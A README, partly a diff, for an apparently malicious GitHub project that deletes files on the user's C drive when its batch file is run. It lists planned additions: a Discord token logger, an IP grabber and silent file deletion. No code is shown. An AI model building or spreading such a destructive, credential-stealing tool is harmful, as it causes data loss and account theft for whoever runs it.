qazwsx-11/chlorine/README.md

 1. Download the latest version in https://github.com/qazwsx-11/c-drive-deleter/releases/
 2. Extract the files onto a your downloads folder, run the file called *!
 Start.bat*, press a key to start deleting files.

+## Things to add in the future

+* Discord Token Logger - Doing
+* IP grabber - Not started yet
+* Silent file deleting - Doing
+* Compile all files into a single file - I have no idea how

 Disclaimer: **I am not responsible for any damage done to your computer if you choose to run this, if you want to test it, I recommend doing it on a Virtual Machine.**